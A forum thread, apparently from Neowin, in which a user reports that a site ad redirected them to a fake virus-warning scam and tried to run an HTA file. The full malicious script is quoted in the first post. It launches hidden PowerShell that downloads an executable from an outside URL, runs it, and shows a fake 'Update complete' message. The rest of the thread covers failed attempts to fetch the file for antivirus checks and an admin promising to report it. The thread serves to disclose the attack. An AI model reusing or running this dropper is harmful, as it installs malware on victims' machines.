exec download from site ad....

[neufuse Veteran]

I'm not sure what ad did this, but when ad's loaded (only twice now out of all the times i come here in the past week) on this site I got redirected to a "you have a virus" scam page and I had an .HTA file try to run with this payload

 

<script>
moveTo(-100,-100);resizeTo(0,0);
a=new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\mess.exe';(New-Object System.Net.WebClient).DownloadFile('http://955.c8542ip.mixiaportaldovaletudo.net/145127282735050/patch.exe',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false);
close();
</script>

this is the second time I've seen this happen on this site's main page after ad's loaded on two different systems.. one in IE11 one in chrome

[The Evil Overlord]

Maybe Neowin's trying to tell you something

 

I personally hate the ones that auto play audio (The 'Think' ads)

 

((Worst part, that ad's now on some sort of loop, and no refreshing or re navigating is fixing it, at this rate, I may as well install an ad blocker also))

[Torolol]

i got HTTP 502 error when i want to download that file for antivirus inspection

[binaryzero]

Seems legit.

[Steven P. Administrators]

Reporting this, will let you know the results.

[neufuse Veteran]

12 hours ago, Torolol said:

i got HTTP 502 error when i want to download that file for antivirus inspection

yeah I tried it yesterday too and got the same thing... but to me even if its not getting the file it is still concerning an ad would be doing this

 

I wanted to see what the file actually was myself...

8 hours ago, Steven P. said:

Reporting this, will let you know the results.

cool, thanks!